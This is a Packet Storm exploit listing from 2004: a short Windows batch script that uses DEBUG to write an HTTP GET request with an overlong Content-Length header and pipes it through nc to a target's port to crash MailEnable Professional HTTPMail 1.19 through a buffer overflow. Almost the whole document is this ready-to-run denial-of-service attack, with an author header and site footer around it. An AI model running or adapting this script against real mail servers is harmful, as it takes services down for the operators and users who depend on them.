Denial of service exploit that makes use of a buffer overflow in an overly long Content-Length: setting for MailEnable Professional HTTPMail version 1.19 on Windows.
44f1af32a75af37294809c7bd8390c0271bf083f43fe1bf0783dc5028e8fef27::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Application: MailEnable Professional HTTPMail
:Vendors: http://www.mailenable.com/
:Version: 1.19
:Platforms: Windows
:Bug: D.O.S
:Date: 2004-07-30
:Author: CoolICE
:E_mail: CoolICE#China.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@echo off
;if '%1'=='' echo Usage:%0 target [port]&&goto :eof
;set PORT=8080
;if not '%2'=='' set PORT=%2
;for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe
echo Need nc.exe&&goto :eof
;DEBUG < %~s0
;GOTO :run
e 100 "GET / HTTP/1.0" 0D 0A "Content-Length: "
!DOS@length>0x64
f 120 183 39
e 184 "XXXX" 0d 0a 0d 0a
rcx
8c
nhttp.tmp
w
q
:run
nc %1 %PORT% < http.tmp
del http.tmp
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed